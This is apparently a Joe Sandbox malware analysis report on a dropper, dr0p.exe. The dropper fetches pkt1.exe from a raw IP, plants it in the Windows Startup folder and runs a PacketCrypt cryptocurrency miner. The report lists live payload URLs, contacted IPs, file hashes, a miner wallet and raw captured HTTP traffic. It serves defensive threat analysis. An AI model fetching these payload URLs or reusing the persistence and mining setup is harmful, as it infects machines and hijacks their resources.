https://www.catcert.net/verarrel	pkt1.exe, 00000004.00000002.4110904218.000001DA4B4D2000.00000002.00000001.01000000.00000007.sdmp, packetcrypt.exe, 00000006.00000002.4113123575.00000239E3DD0000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000000.2079334910.00007FF70BA74000.00000002.00000001.01000000.0000000E.sdmp, packetcrypt.exe, 00000006.00000002.4113123575.00000239E3DA8000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4110027580.00000239E1266000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4110027580.00000239E12FB000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4110027580.00000239E1338000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4113123575.00000239E3D8F000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4113123575.00000239E3D10000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4110027580.00000239E1289000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000002.4110027580.00000239E12C1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aka.ms/dotnet/sdk-not-foundProbing	pkt1.exe, 00000004.00000000.2021865265.00007FF68EC8D000.00000002.00000001.01000000.00000005.sdmp, pkt1.exe, 00000004.00000002.4115297870.00007FF68EC8D000.00000002.00000001.01000000.00000005.sdmp	false		high
http://pool.pkt.world/config.json/	packetcrypt.exe, 00000006.00000002.4110027580.00000239E124C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkd	packetcrypt.exe, 00000006.00000003.3315537423.00000239E3F26000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3432215491.00000239E3F26000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3404416010.00000239E3F26000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.world/config.json1	packetcrypt.exe, 00000006.00000003.4102559515.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.4103176882.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3404637050.00000239E3F61000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3314559971.00000239E3F61000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.world/master/blkinfo_e21c206fb56ab02307270f6e5a7a0ada30138fb95f832f7d4b09d83d9cd3a8f	packetcrypt.exe, 00000006.00000002.4110027580.00000239E1289000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.world/config.json-	packetcrypt.exe, 00000006.00000003.2673079242.00000239E4013000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2771207181.00000239E401B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://any.ah.pkt.worK	packetcrypt.exe, 00000006.00000003.4006810941.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://master.pkt.world/pay	packetcrypt.exe, 00000006.00000003.3255910417.00000239E3F25000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.world/config.json8	packetcrypt.exe, 00000006.00000002.4113525249.00000239E3E35000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/GlobalizationInvariantMode	pkt1.exe, 00000004.00000002.4115743156.00007FFDFACF1000.00000020.00000001.01000000.00000006.sdmp	false		high
http://pool.pkt.F	packetcrypt.exe, 00000006.00000003.2546735475.00000239E3F2A000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2562035582.00000239E3F2D000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2547416911.00000239E3F2A000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2561511282.00000239E3F26000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.worldC:	packetcrypt.exe, 00000006.00000002.4110027580.00000239E1240000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.world/config.json2	packetcrypt.exe, 00000006.00000003.2673122820.00000239E3F69000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2650949600.00000239E3F69000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.world/masterD	packetcrypt.exe, 00000006.00000002.4110027580.00000239E124C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.world/masterbmitn	packetcrypt.exe, 00000006.00000003.3405109910.00000239E3F66000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3404637050.00000239E3F61000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://any.ah.pkt.world/anns/submit?c	packetcrypt.exe, 00000006.00000003.3690586624.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3691676939.00000239E3F60000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.3813765986.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pool.pkt.world/blk/submE	packetcrypt.exe, 00000006.00000003.4006810941.00000239E3F5E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/dotnet-illink/nativehost	pkt1.exe, 00000004.00000002.4115743156.00007FFDFACF1000.00000020.00000001.01000000.00000006.sdmp, pkt1.exe, 00000004.00000002.4115743156.00007FFDFB466000.00000020.00000001.01000000.00000006.sdmp	false		high
https://aka.ms/dotnet/download	pkt1.exe, 00000004.00000000.2021865265.00007FF68EC8D000.00000002.00000001.01000000.00000005.sdmp, pkt1.exe, 00000004.00000002.4115297870.00007FF68EC8D000.00000002.00000001.01000000.00000005.sdmp	false		high
http://pool.pkt.world/master=2;	packetcrypt.exe, 00000006.00000003.2972152073.00000239E3F67000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000006.00000003.2969163094.00000239E3F67000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
199.16.240.187	pool.pkt.world	Reserved	397525	ALPHAONE-ASUS	false
23.27.51.244	unknown	United States	18779	EGIHOSTINGUS	false
199.16.240.205	any.ah.pkt.world	Reserved	397525	ALPHAONE-ASUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1585312
Start date and time:	2025-01-07 13:57:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 3s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	dr0p.exe
Detection:	MAL
Classification:	mal76.troj.adwa.winEXE@7/174@2/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: dr0p.exe

Simulations

Behavior and APIs

Time	Type	Description
12:57:59	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
23.27.51.244	http://23.27.51.244/dr0p.exe	Get hash	malicious	Unknown	Browse	23.27.51.244/pkt1.exe
23.27.51.244	dr0p.exe	Get hash	malicious	Unknown	Browse	23.27.51.244/mh.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
any.ah.pkt.world	http://23.27.51.244/dr0p.exe	Get hash	malicious	Unknown	Browse	23.147.168.68
pool.pkt.world	http://23.27.51.244/dr0p.exe	Get hash	malicious	Unknown	Browse	151.80.239.86

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ALPHAONE-ASUS	spc.elf	Get hash	malicious	Unknown	Browse	38.79.86.247
	Payload 94.75.225.exe	Get hash	malicious	Unknown	Browse	45.11.229.132
	la.bot.sparc.elf	Get hash	malicious	Unknown	Browse	38.79.86.221
	na.elf	Get hash	malicious	Mirai, Okiru	Browse	38.79.86.229
	PT54FFSL7ET46RASB.exe	Get hash	malicious	LummaC Stealer, PureLog Stealer, Xmrig, zgRAT	Browse	45.11.229.96
	57lklPjdPc.exe	Get hash	malicious	LummaC, PureLog Stealer, zgRAT	Browse	45.11.229.96
	PT54FFSL7ET46RASB.exe	Get hash	malicious	LummaC, PureLog Stealer, Xmrig, zgRAT	Browse	45.11.229.96
	o9OIGsDt4m.exe	Get hash	malicious	Xmrig	Browse	45.11.229.96
	57lklPjdPc.exe	Get hash	malicious	LummaC, PureLog Stealer, zgRAT	Browse	45.11.229.96
	temp_script.bat	Get hash	malicious	PureLog Stealer	Browse	45.11.229.96
ALPHAONE-ASUS	spc.elf	Get hash	malicious	Unknown	Browse	38.79.86.247
	Payload 94.75.225.exe	Get hash	malicious	Unknown	Browse	45.11.229.132
	la.bot.sparc.elf	Get hash	malicious	Unknown	Browse	38.79.86.221
	na.elf	Get hash	malicious	Mirai, Okiru	Browse	38.79.86.229
	PT54FFSL7ET46RASB.exe	Get hash	malicious	LummaC Stealer, PureLog Stealer, Xmrig, zgRAT	Browse	45.11.229.96
	57lklPjdPc.exe	Get hash	malicious	LummaC, PureLog Stealer, zgRAT	Browse	45.11.229.96
	PT54FFSL7ET46RASB.exe	Get hash	malicious	LummaC, PureLog Stealer, Xmrig, zgRAT	Browse	45.11.229.96
	o9OIGsDt4m.exe	Get hash	malicious	Xmrig	Browse	45.11.229.96
	57lklPjdPc.exe	Get hash	malicious	LummaC, PureLog Stealer, zgRAT	Browse	45.11.229.96
	temp_script.bat	Get hash	malicious	PureLog Stealer	Browse	45.11.229.96
EGIHOSTINGUS	http://23.27.51.244/dr0p.exe	Get hash	malicious	Unknown	Browse	23.27.51.244
	https://dreamsmaybachawuradekasa.org/?dococbwt&qrc=ZHlsYW4uZHVmZnk4QHlhaG9vLmNvbQ==	Get hash	malicious	Unknown	Browse	23.27.244.219
	dr0p.exe	Get hash	malicious	Unknown	Browse	23.27.51.244
	armv6l.elf	Get hash	malicious	Unknown	Browse	136.0.151.194
	2.elf	Get hash	malicious	Unknown	Browse	107.164.241.37
	31.13.224.14-mips-2025-01-03T22_14_18.elf	Get hash	malicious	Mirai	Browse	192.177.167.92
	botx.arm7.elf	Get hash	malicious	Mirai	Browse	166.88.83.119
	spc.elf	Get hash	malicious	Mirai, Moobot	Browse	104.253.169.92
	loligang.spc.elf	Get hash	malicious	Mirai	Browse	45.38.212.251
	nabspc.elf	Get hash	malicious	Unknown	Browse	142.252.146.175

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\Microsoft.CSharp.dll	http://23.27.51.244/dr0p.exe	Get hash	malicious	Unknown	Browse
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\Microsoft.VisualBasic.Core.dll	http://23.27.51.244/dr0p.exe	Get hash	malicious	Unknown	Browse
C:\Users\user\AppData\Local\Temp\.net\pkt1\904\Microsoft.VisualBasic.dll	http://23.27.51.244/dr0p.exe	Get hash	malicious	Unknown	Browse

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe
File Type:	PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1005840
Entropy (8bit):	6.7186531276890715
Encrypted:	false
SSDEEP:	24576:06dJq30vVE6z8LpeNY+9whtbShFtHVu9yHesCGDUD3I1i:FQ34VEYKaY++tbiHVu9yHFgrt
MD5:	9B2A6ABE569D6BFF344CF07D3DF523A3
SHA1:	2856F7F922F70A44132D02C0723EC2FA91E1FEDB
SHA-256:	099BC112DC645BC4A1FC453E3B4C1FC93A164BFAF69E84C85C2B6EFAC0F7FAAB
SHA-512:	B649400460CF236197ED168702707FB7E81FE4AA3D2542EDC07B1D3E1C520C6ECA54F77F7ABDB2DB297AEA0BC82E7A07ABF99A89CB958FEC138CDEE4FDEC5E79
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: , Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...[............." ..... ...................................................0............`...@......@............... ..................................d....*..TQ...0...)...........;..p...........................................................h...H............text............ .................. ..`.data........0.......0..............@....reloc........... ..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Users\user\Desktop\dr0p.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	42445246
Entropy (8bit):	7.8570881105931605
Encrypted:	false
SSDEEP:	786432:Vbn8aqof9w/btha295CIkrysYevnvLe8odU2EGyUh+j3xO7q7w:Vb8aqw92GkSysJvnvafPcBO20
MD5:	5F6CDA0F181FE14E6D395CDB50C37C41
SHA1:	FADDE84250EBDA58F7FF880B5942D7B6ACB494BB
SHA-256:	717FE92A00AB25CAE8A46265293E3D1F25B2326ECD31406E7A2821853C64D397
SHA-512:	C7C127A650508F21C7447184984374395F5DEC259DEAAA381D8CFFFB46E9209340530C0D7187027606F67B8309BEDF7F1EA7A587AD34EDF64BF54649065B9918
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Y..N8.DN8.DN8.DG@vDX8.D...EZ8.D...E\8.D...E.8.D>..EF8.D>..EC8.DN8.DF:.D]..E[8.D]..E.:.D]..EO8.D]..DO8.D]..EO8.DRichN8.D........PE..d...!_.g.........."....(..a...1.......\........@.............................p............`..........................................fy......gy.h....p.. s....{..`.............,~....p.T.....................p.(...@Eb.@.............a......dy.`....................text.....a.......a................. ..`.CLR_UEF......a.......a............. ..`.rdata........a.......a.............@..@.data.........y......ty.............@....pdata...`....{..b....z.............@..@.didat..8............n}.............@...Section...... .......p}.............@..._RDATA...2...0...4...r}.............@..@.rsrc... s...p...t....~.............@..@.reloc..,~.........................@..B................................................................................

File type:	MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.200897825709746
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	dr0p.exe
File size:	541 bytes
MD5:	5290766026d3727c3262fd48db6db0a4
SHA1:	59aec8a9c0e6f59bfee7902fbdcb6e3b9932a93b
SHA256:	d078d8690446e831acc794ee2df5dfabcc5299493e7198993149e3c0c33ccb36
SHA512:	0c7a27b3e7e86c3a93085c991caa7c781cf96239ddf7e7a5842402b5539d8b35ea695ecbc654d28aa3f502b5827620d38717ac65bc508e644dd2b69b32bb07b9
SSDEEP:	6:6KJAMslZy5BtIROZYlE+ltS+E20TtLRgEz4YtlWdps+pNsWi/WJMQBVkOiWy48AV:6zsqplcTBCENMdplQRwr8qXAs1
TLSH:	8FF0E1B5242DACC688B2ED2004C65A4516B8E3DC7481053A97EAA4619881845966E0C5
File Content Preview:	MZ23PE..L.....-..@...E.,......`....2.ukNO1..d.....r.u..Z..@.............y.....P=.....w..0...Z\|......S...B.j.X1...Wj.Yj.=....j...e$...`..1...t$(N..au.@B..r.........F9........V$=....t..F ....aK..r.u.[f..........Z9.r..).).....G....1........@..l.....x........

Entrypoint:	0x400064
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE
DLL Characteristics:
Time Stamp:	0xE22DA30F [Fri Mar 31 11:07:59 2090 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	49153
OS Version Minor:	49285
File Version Major:	49153
File Version Minor:	49285
Subsystem Version Major:	49153
Subsystem Version Minor:	49285
Import Hash:

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 7, 2025 13:58:37.904792070 CET	192.168.2.4	1.1.1.1	0x686f	Standard query (0)	pool.pkt.world	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:58:52.159152031 CET	192.168.2.4	1.1.1.1	0x9667	Standard query (0)	any.ah.pkt.world	A (IP address)	IN (0x0001)	false

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 7, 2025 13:58:37.913866997 CET	1.1.1.1	192.168.2.4	0x686f	No error (0)	pool.pkt.world	199.16.240.187	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:58:37.913866997 CET	1.1.1.1	192.168.2.4	0x686f	No error (0)	pool.pkt.world	23.147.168.200	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:58:37.913866997 CET	1.1.1.1	192.168.2.4	0x686f	No error (0)	pool.pkt.world	151.80.239.86	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:58:52.166094065 CET	1.1.1.1	192.168.2.4	0x9667	No error (0)	any.ah.pkt.world	199.16.240.205	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:58:52.166094065 CET	1.1.1.1	192.168.2.4	0x9667	No error (0)	any.ah.pkt.world	23.147.168.71	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:58:52.166094065 CET	1.1.1.1	192.168.2.4	0x9667	No error (0)	any.ah.pkt.world	199.16.240.197	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:58:52.166094065 CET	1.1.1.1	192.168.2.4	0x9667	No error (0)	any.ah.pkt.world	23.147.168.70	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:58:52.166094065 CET	1.1.1.1	192.168.2.4	0x9667	No error (0)	any.ah.pkt.world	23.147.168.69	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:58:52.166094065 CET	1.1.1.1	192.168.2.4	0x9667	No error (0)	any.ah.pkt.world	199.16.240.207	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:58:52.166094065 CET	1.1.1.1	192.168.2.4	0x9667	No error (0)	any.ah.pkt.world	199.16.240.209	A (IP address)	IN (0x0001)	false
Jan 7, 2025 13:58:52.166094065 CET	1.1.1.1	192.168.2.4	0x9667	No error (0)	any.ah.pkt.world	23.147.168.68	A (IP address)	IN (0x0001)	false

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 13:57:59.457601070 CET	96	OUT	GET /pkt1.exe HTTP/1.1 User-Agent: Mozilla/5.0 Host: 23.27.51.244 Cache-Control: no-cache
Jan 7, 2025 13:57:59.936976910 CET	1236	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:57:59 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 06 Jan 2025 05:15:33 GMT ETag: "287a9be-62b02b7c80797" Accept-Ranges: bytes Content-Length: 42445246 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0a 59 8b 17 4e 38 e5 44 4e 38 e5 44 4e 38 e5 44 47 40 76 44 58 38 e5 44 8d bb e6 45 5a 38 e5 44 8d bb e1 45 5c 38 e5 44 8d bb e0 45 11 38 e5 44 3e b9 e1 45 46 38 e5 44 3e b9 e4 45 43 38 e5 44 4e 38 e4 44 46 3a e5 44 5d bc e6 45 5b 38 e5 44 5d bc ec 45 c3 3a e5 44 5d bc e5 45 4f 38 e5 44 5d bc 1a 44 4f 38 e5 44 5d bc e7 45 4f 38 e5 44 52 69 63 68 4e 38 e5 44 00 00 00 00 00 00 00 00 50 45 00 00 64 86 0a 00 21 5f 11 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 28 00 aa 61 00 00 ec 31 00 00 00 00 00 90 fe 5c 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$YN8DN8DN8DG@vDX8DEZ8DE\8DE8D>EF8D>EC8DN8DF:D]E[8D]E:D]EO8D]DO8D]EO8DRichN8DPEd!_g"(a1\@p`fygyhp s{`,~pTp(@Eb@ady`.textaa `.CLR_UEFaa `.rdataaa@@.datayty@.pdata`{bz@@.didat8n}@Section p}@_RDATA204r}@@.rsrc spt~@@.reloc,~@B
Jan 7, 2025 13:57:59.937002897 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 8d 0d d9 9f 61 00 e9 a8 ea 5c 00 cc cc cc cc 48 8d 0d e9 9f 61 00 e9 98 ea 5c 00 cc cc cc cc b9 20 00 00 00 48 Data Ascii: Ha\Ha\ H<y3AIfL@H@ LHPH@8HuLyHy LyHyH(Jy@Hya7y%'yH
Jan 7, 2025 13:57:59.937012911 CET	1236	IN	Data Raw: 28 c3 cc cc cc cc cc cc cc cc cc cc 48 83 ec 28 f2 0f 10 05 14 b6 79 00 66 0f 2e 05 e4 91 70 00 7a 27 75 25 48 8d 4c 24 30 ff 15 25 c0 61 00 0f 57 c0 f2 48 0f 2a 44 24 30 f2 0f 5e 05 03 91 70 00 f2 0f 11 05 e3 b5 79 00 48 c7 05 60 fd 7a 00 00 00 Data Ascii: (H(yf.pz'u%HL$0%aWHD$0^pyH`zH(3HyHyHyHyHav\H)ah\H)aX\H(tyf.Dpz'u%HL$0aWHD$0^cpCyHz
Jan 7, 2025 13:57:59.937024117 CET	1236	IN	Data Raw: e9 27 e5 5c 00 cc cc cc 48 83 ec 28 41 b8 08 00 00 00 48 8d 15 9f 56 6e 00 48 8d 0d 20 26 7b 00 e8 83 20 52 00 48 8d 0d 1c 9f 61 00 48 83 c4 28 e9 f7 e4 5c 00 cc cc cc 48 83 ec 28 41 b8 02 00 00 00 48 8d 15 0b 16 6d 00 48 8d 0d b0 25 7b 00 e8 53 Data Ascii: '\H(AHVnH &{ RHaH(\H(AHmH%{S RH\aH(\H(H,z\4]HaH(\Hya\Ha\H(H5/z4]HaH(d\HyaX\H\$HL$WH HHI
Jan 7, 2025 13:57:59.937036037 CET	448	IN	Data Raw: 24 70 48 85 c0 74 2c 48 8b 4f 08 48 8b 07 48 89 03 89 6b 08 33 c0 48 89 43 0c 49 8d 46 10 48 89 43 20 49 8b d6 e8 2a c4 00 00 48 89 43 18 45 33 f6 eb 06 45 33 f6 41 8b de 48 89 1f 39 77 10 0f 47 77 10 89 77 10 eb 03 45 33 f6 4c 63 43 0c 48 8b 43 Data Ascii: $pHt,HOHHk3HCIFHC I*HCE3E3AH9wGwwE3LcCHC J4C(SEtIDt$8HL\$@I[8Ik@IsHIA_A^A]A\_H\$Hl$Ht$ WH AHHHi(Hl$0HH9zLtDLIHaHIuw HH
Jan 7, 2025 13:57:59.937046051 CET	1236	IN	Data Raw: d8 03 00 00 e8 4b ce 00 00 90 48 8d 83 88 04 00 00 48 89 44 24 38 48 89 38 48 89 78 08 48 89 78 10 48 89 78 18 48 89 78 20 48 89 78 28 48 89 bb 68 02 00 00 48 89 bb 78 02 00 00 48 8b 0d 42 33 7a 00 48 8b 01 48 8b 40 10 ff 15 6d c2 61 00 48 89 83 Data Ascii: KHHD$8H8HxHxHxHx Hx(HhHxHB3zHH@maHpHWCCC(C8Whx(8HXHH\$@H _
Jan 7, 2025 13:57:59.937068939 CET	1236	IN	Data Raw: 48 8b 11 48 85 d2 74 0d 48 8b 02 48 89 01 48 8b 8e 48 07 00 00 48 39 96 50 07 00 00 75 07 48 89 8e 50 07 00 00 33 ff 48 85 d2 48 0f 45 fa 48 89 5c 24 30 45 33 c9 44 89 4c 24 38 48 85 db 74 13 48 8b cb e8 c8 c5 03 00 41 b9 01 00 00 00 44 89 4c 24 Data Ascii: HHtHHHHH9PuHP3HHEH\$0E3DL$8HtHADL$8LG3HC8Ht%HHXI;tHHHuHuHK8HJXEtHLD$8HHH9SHHH@ +aIEHD$ DpDt$(Eu%HD$ @2ztHl$ H
Jan 7, 2025 13:57:59.937079906 CET	1236	IN	Data Raw: 89 45 77 8b 54 24 38 41 8b c8 d3 ea ff ca 48 8b 44 24 48 48 83 e8 02 48 8d 14 50 48 3b fa 77 5a 66 83 3f 3b 74 0b 48 83 c7 02 48 3b fa 76 f1 eb 49 48 89 7c 24 50 44 89 44 24 58 44 89 75 7f 0f 28 7c 24 50 eb 57 41 f7 d0 41 83 e0 01 44 89 45 77 8b Data Ascii: EwT$8AHD$HHHPH;wZf?;tHH;vIH\|$PDD$XDu(\|$PWAADEwD$8AHHT$HHHH;w?;tHH;vuA()\|$PfofsfA~DEwfH~D$ T$$D$(ML\|$0LfH~HEL+AI\$@D$(Eu?D$(U
Jan 7, 2025 13:57:59.937092066 CET	672	IN	Data Raw: c0 0f 88 94 00 00 00 33 f6 89 75 af f6 c3 08 74 17 4d 85 f6 74 12 4d 8b c6 33 d2 48 8b 0d c6 65 7b 00 ff 15 50 a8 61 00 48 8b c7 48 2b 45 87 8b 4d 77 48 d3 f8 85 c0 74 12 41 be 01 00 00 00 4c 8d 3d 72 fd 63 00 e9 ad fa ff ff f6 44 24 40 08 74 19 Data Ascii: 3utMtM3He{PaHH+EMwHtAL=rcD$@tLD$HMt3He{aL$I[HA(sA({E(CIA_A^A]A\_^]+V+H\$Hl$VWATAVAWH0MDHMtIHHL$ E3L9x
Jan 7, 2025 13:57:59.941992044 CET	1236	IN	Data Raw: 8d 35 d2 8a 62 00 33 db 48 85 c0 74 13 48 89 30 48 89 58 08 48 8d 0d 9d 8a 62 00 48 89 08 eb 03 48 8b c3 48 89 05 26 24 7a 00 48 8b c8 e8 06 a3 0c 00 b9 10 00 00 00 e8 3c bb 2b 00 48 89 44 24 50 48 85 c0 74 13 48 89 30 48 89 58 08 48 8d 0d 04 8a Data Ascii: 5b3HtH0HXHbHHH&$zH<+HD$PHtH0HXHbHHH#zH+HD$PHtH0HXHbHHH#zH+HD$PHtH0HXHRbHHHb+HD$PHtH0HXH
Jan 7, 2025 13:57:59.942050934 CET	1236	IN	Data Raw: 8b cf e8 9d a0 2c 00 81 4f 08 00 01 00 00 48 8d 9e e8 0e 00 00 48 8b d7 48 8b cb e8 f4 af 00 00 c7 45 e0 02 00 00 00 c7 45 e4 02 00 00 00 c7 45 e8 10 00 00 00 48 8d 05 08 f6 63 00 48 89 45 f0 c7 45 e8 10 00 00 00 c7 45 e8 14 00 00 00 c7 45 e8 14 Data Ascii: ,OHHHEEEHcHEEEEE+HEEEEE\A\fDxHUH,EtLEMt3H]{HauAHH>cHH,KH0

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 13:58:52.329123974 CET	277	OUT	POST /anns/submit?cookie=4a3701444348c2607de40463d7dc7d0a8e9940959292aab39a317c42591d2da0 HTTP/1.1 x-pc-payto: pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a x-pc-sver: 1 x-pc-annver: 1 x-pc-worknum: 2837096 accept: / host: any.ah.pkt.world transfer-encoding: chunked
Jan 7, 2025 13:58:52.329231977 CET	11124	OUT	Data Raw: 34 30 30 0d 0a 01 6b 02 00 4e 7c 8c e1 b4 43 17 1f 67 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 400kN\|CgJ+??fH7V1Om;BQWq224n]=ilxT%l6*mZ]F$&zq[9j!NF./q\mZ6zhJQ,CM
